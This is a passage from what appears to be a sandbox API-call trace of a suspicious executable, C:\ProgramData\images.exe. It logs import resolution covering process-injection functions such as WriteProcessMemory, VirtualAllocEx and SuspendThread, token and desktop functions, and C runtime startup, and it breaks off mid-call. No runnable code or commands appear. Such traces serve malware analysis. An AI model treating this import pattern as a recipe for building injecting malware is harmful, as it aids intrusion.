lpProcName="GetProcAddress") returned 0x74ca78b0 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="SystemTimeToTzSpecificLocalTime") returned 0x74cb5c30 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateJobObject") returned 0x74cdbf40 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateProcess") returned 0x74cb5100 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="TlsAlloc") returned 0x74caa120 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="TlsFree") returned 0x74caa040 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="TlsGetValue") returned 0x74ca1b70 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="TlsSetValue") returned 0x74ca29d0 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="TransactNamedPipe") returned 0x74cd2600 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77783650 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="UnhandledExceptionFilter") returned 0x74cd2670 [0290.220] GetProcAddress (hModule=0x74c90000, lpProcName="UnlockFileEx") returned 0x74cb6c90 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="UnmapViewOfFile") returned 0x74ca9b20 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="UnregisterWaitEx") returned 0x74caf310 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAllocEx") returned 0x74cd2730 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFree") returned 0x74ca7600 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFreeEx") returned 0x74cd2750 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtectEx") returned 0x74cd2790 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQuery") returned 0x74ca7a90 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQueryEx") returned 0x74cd27b0 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObject") returned 0x74cb6820 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObjectEx") returned 0x74cb6830 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="WaitNamedPipeW") returned 0x74cb5e70 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="WakeAllConditionVariable") returned 0x777c8d70 [0290.221] GetProcAddress (hModule=0x74c90000, lpProcName="Wow64GetThreadContext") returned 0x74cd3e30 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="WriteConsoleW") returned 0x74cb7020 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="WriteFile") returned 0x74cb6ca0 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="WriteProcessMemory") returned 0x74cd2850 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenW") returned 0x74ca3690 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameA") returned 0x74caa720 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileW") returned 0x74cb6890 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="GetConsoleMode") returned 0x74cb6f70 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="GetConsoleCP") returned 0x74cb6f60 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="FlushFileBuffers") returned 0x74cb69b0 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="GetStringTypeW") returned 0x74ca7950 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceExW") returned 0x74ca8ca0 [0290.222] GetProcAddress (hModule=0x74c90000, lpProcName="FreeEnvironmentStringsW") returned 0x74caa7e0 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetEnvironmentStringsW") returned 0x74caaac0 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineW") returned 0x74caaba0 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetCPInfo") returned 0x74caa290 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetOEMCP") returned 0x74cb5140 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileA") returned 0x74cb6980 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileExA") returned 0x74cb6930 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="FindClose") returned 0x74cb68e0 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileType") returned 0x74cb6aa0 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetACP") returned 0x74ca8500 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetStdHandle") returned 0x74caa6e0 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleExW") returned 0x74caa2b0 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="ExitProcess") returned 0x74cb7b30 [0290.223] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemInfo") returned 0x74caa0f0 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="FreeLibrary") returned 0x74ca9f50 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemTimeAsFileTime") returned 0x74ca7620 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcessId") returned 0x74ca23e0 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="GetStartupInfoW") returned 0x74caa740 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="CreateEventW") returned 0x74cb66b0 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="CloseHandle") returned 0x74cb6630 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcess") returned 0x74ca38c0 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="EncodePointer") returned 0x777bf730 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="SwitchToThread") returned 0x74caa690 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleW") returned 0x74ca9bc0 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtect") returned 0x74ca7a50 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAlloc") returned 0x74ca7810 [0290.224] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentThreadId") returned 0x74ca1b90 [0290.225] GetProcAddress (hModule=0x74c90000, lpProcName="Sleep") returned 0x74ca7990 [0290.225] GetProcAddress (hModule=0x74c90000, lpProcName="SetEvent") returned 0x74cb67d0 [0290.225] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteCriticalSection") returned 0x777b0e60 [0290.225] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSectionEx") returned 0x74cb6740 [0290.225] GetProcAddress (hModule=0x74c90000, lpProcName="LeaveCriticalSection") returned 0x7779f210 [0290.281] GetProcAddress (hModule=0x74c90000, lpProcName="EnterCriticalSection") returned 0x7779f290 [0290.281] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcessHeap") returned 0x74ca7710 [0290.281] GetProcAddress (hModule=0x74c90000, lpProcName="HeapSize") returned 0x7778bb20 [0290.281] GetProcAddress (hModule=0x74c90000, lpProcName="HeapFree") returned 0x74ca1ba0 [0290.281] GetProcAddress (hModule=0x74c90000, lpProcName="HeapReAlloc") returned 0x7778efe0 [0290.282] GetProcAddress (hModule=0x74c90000, lpProcName="HeapAlloc") returned 0x77792bd0 [0290.282] GetProcAddress (hModule=0x74c90000, lpProcName="HeapDestroy") returned 0x74cb4c30 [0290.282] GetProcAddress (hModule=0x74c90000, lpProcName="SetLastError") returned 0x74ca2af0 [0290.282] GetProcAddress (hModule=0x74c90000, lpProcName="GetLastError") returned 0x74ca3870 [0290.282] GetProcAddress (hModule=0x74c90000, lpProcName="RaiseException") returned 0x74ca8c20 [0290.282] GetProcAddress (hModule=0x74c90000, lpProcName="DecodePointer") returned 0x777bd830 [0290.282] GetProcAddress (hModule=0x74c90000, lpProcName="SuspendThread") returned 0x74caef60 [0290.282] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineA") returned 0x74caab60 [0290.282] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75830000 [0290.282] GetProcAddress (hModule=0x75830000, lpProcName="SetThreadToken") returned 0x75840f50 [0290.282] GetProcAddress (hModule=0x75830000, lpProcName="SetSecurityInfo") returned 0x758505f0 [0290.282] GetProcAddress (hModule=0x75830000, lpProcName="SetKernelObjectSecurity") returned 0x75852d10 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="SetEntriesInAclW") returned 0x75852bf0 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="RevertToSelf") returned 0x7584fc20 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExW") returned 0x7584f7f0 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExW") returned 0x7584f330 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExW") returned 0x7584f350 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="RegDisablePredefinedCache") returned 0x758511d0 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="ConvertStringSidToSidW") returned 0x7584ddc0 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x7584cbe0 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="ConvertSidToStringSidW") returned 0x7584f060 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="AccessCheck") returned 0x75851230 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExA") returned 0x75850a20 [0290.283] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExA") returned 0x7584f790 [0290.284] GetProcAddress (hModule=0x75830000, lpProcName="RegEnumKeyExA") returned 0x75851810 [0290.284] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyA") returned 0x758504a0 [0290.284] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExA") returned 0x7584fa60 [0290.284] GetProcAddress (hModule=0x75830000, lpProcName="RegCloseKey") returned 0x7584f620 [0290.284] GetProcAddress (hModule=0x75830000, lpProcName="SetTokenInformation") returned 0x75853840 [0290.284] GetProcAddress (hModule=0x75830000, lpProcName="SystemFunction036") returned 0x74482a60 [0290.284] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x749b0000 [0290.284] GetProcAddress (hModule=0x749b0000, lpProcName="GetTextExtentPoint32A") returned 0x74a5cf10 [0290.284] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77660000 [0290.284] GetProcAddress (hModule=0x77660000, lpProcName="CoAddRefServerProcess") returned 0x77550d30 [0290.284] GetProcAddress (hModule=0x77660000, lpProcName="CoReleaseServerProcess") returned 0x77553950 [0290.284] GetProcAddress (hModule=0x77660000, lpProcName="CoCreateInstance") returned 0x77500060 [0290.285] GetProcAddress (hModule=0x77660000, lpProcName="StringFromCLSID") returned 0x7752dcf0 [0290.285] GetProcAddress (hModule=0x77660000, lpProcName="CoTaskMemFree") returned 0x774d9170 [0290.285] GetProcAddress (hModule=0x77660000, lpProcName="CoInitialize") returned 0x77691930 [0290.285] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x755e0000 [0290.285] GetProcAddress (hModule=0x755e0000, lpProcName=0xa2) returned 0x75605250 [0290.285] GetProcAddress (hModule=0x755e0000, lpProcName=0xa1) returned 0x755f38b0 [0290.285] GetProcAddress (hModule=0x755e0000, lpProcName=0x115) returned 0x755f4910 [0290.285] GetProcAddress (hModule=0x755e0000, lpProcName=0x7) returned 0x755f2640 [0290.285] GetProcAddress (hModule=0x755e0000, lpProcName=0x6) returned 0x755f9d40 [0290.285] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c70000 [0290.285] GetProcAddress (hModule=0x75c70000, lpProcName="CommandLineToArgvW") returned 0x75e1bf80 [0290.286] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFolderPathW") returned 0x75e14e80 [0290.286] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetKnownFolderPath") returned 0x75e19710 [0290.286] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFileInfoA") returned 0x75e28c50 [0290.286] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x756d0000 [0290.286] GetProcAddress (hModule=0x756d0000, lpProcName="CharNextA") returned 0x756fe240 [0290.286] GetProcAddress (hModule=0x756d0000, lpProcName="ShowWindow") returned 0x75708e60 [0290.286] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0290.286] GetProcAddress (hModule=0x756d0000, lpProcName="DestroyWindow") returned 0x757092b0 [0290.286] GetProcAddress (hModule=0x756d0000, lpProcName="PostThreadMessageA") returned 0x75704810 [0290.286] GetProcAddress (hModule=0x756d0000, lpProcName="GetDlgItem") returned 0x756fcc40 [0290.286] GetProcAddress (hModule=0x756d0000, lpProcName="AllowSetForegroundWindow") returned 0x75704b10 [0290.286] GetProcAddress (hModule=0x756d0000, lpProcName="ReleaseDC") returned 0x756eba40 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="GetDC") returned 0x75708990 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="EnableWindow") returned 0x757029d0 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="IsWindowVisible") returned 0x75705960 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="SendMessageA") returned 0x756fa220 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterClassW") returned 0x756e9800 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="PostMessageW") returned 0x756ed700 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="IsWindow") returned 0x756e8f70 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="GetWindowThreadProcessId") returned 0x756eda50 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="GetUserObjectInformationW") returned 0x75708fa0 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="GetThreadDesktop") returned 0x75709110 [0290.287] GetProcAddress (hModule=0x756d0000, lpProcName="GetProcessWindowStation") returned 0x75708b10 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="GetMessageW") returned 0x75704f60 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="FindWindowExW") returned 0x75704110 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="DispatchMessageW") returned 0x756e62e0 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="DefWindowProcW") returned 0x777eaee0 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowStationW") returned 0x7572c280 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowExW") returned 0x756e9860 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="CreateDesktopW") returned 0x7572c200 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="CloseWindowStation") returned 0x75709430 [0290.288] GetProcAddress (hModule=0x756d0000, lpProcName="CloseDesktop") returned 0x75709340 [0290.289] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0290.390] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0290.485] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff64 | out: lpSystemTimeAsFileTime=0x19ff64*(dwLowDateTime=0xcf1ef965, dwHighDateTime=0x1d86dce)) [0290.485] GetCurrentThreadId () returned 0xfbc [0290.485] GetCurrentProcessId () returned 0xfb8 [0290.485] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff5c | out: lpPerformanceCount=0x19ff5c*=2213732256744) returned 1 [0290.485] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0290.486] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0290.487] GetProcAddress (hModule=0x75ac0000, lpProcName="InitializeCriticalSectionEx") returned 0x75b7d740 [0290.487] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0290.487] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsAlloc") returned 0x75b84490 [0290.487] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsSetValue") returned 0x75b7d7a0 [0290.488] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0290.488] GetProcAddress (hModule=0x75ac0000, lpProcName="InitializeCriticalSectionEx") returned 0x75b7d740 [0290.489] GetProcessHeap () returned 0x650000 [0290.489] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0290.489] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsAlloc") returned 0x75b84490 [0290.489] GetLastError () returned 0xcb [0290.489] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsGetValue") returned 0x75b6f350 [0290.489] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsSetValue") returned 0x75b7d7a0 [0290.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x364) returned 0x660e88 [0290.490] SetLastError (dwErrCode=0xcb) [0290.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc00) returned 0x6611f8 [0290.492] GetStartupInfoW (in: lpStartupInfo=0x19fe98 | out: lpStartupInfo=0x19fe98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x408b30, hStdOutput=0xa224e240, hStdError=0xfffffffe)) [0290.492] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0290.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0290.492] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0290.492] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\"" [0290.492] GetCommandLineW () returned="\"C:\\ProgramData\\images.exe\"" [0290.493] GetACP () returned 0x4e4 [0290.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x220) returned 0x661e00 [0290.493] IsValidCodePage (CodePage=0x4e4) returned 1 [0290.493] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19feb8 | out: lpCPInfo=0x19feb8) returned 1 [0290.493] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f780 | out: lpCPInfo=0x19f780) returned 1 [0290.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0290.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f518, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0290.493] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x19f794 | out: lpCharType=0x19f794) returned 1 [0290.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0290.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0290.494] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0290.495] GetProcAddress (hModule=0x75ac0000, lpProcName="LCMapStringEx") returned 0x75b695f0 [0290.495] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0290.495] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f2b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0290.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19fc94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ°\x1c\x7f¢Ðþ\x19", lpUsedDefaultChar=0x0) returned 256 [0290.495] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0290.495] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0290.495] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" 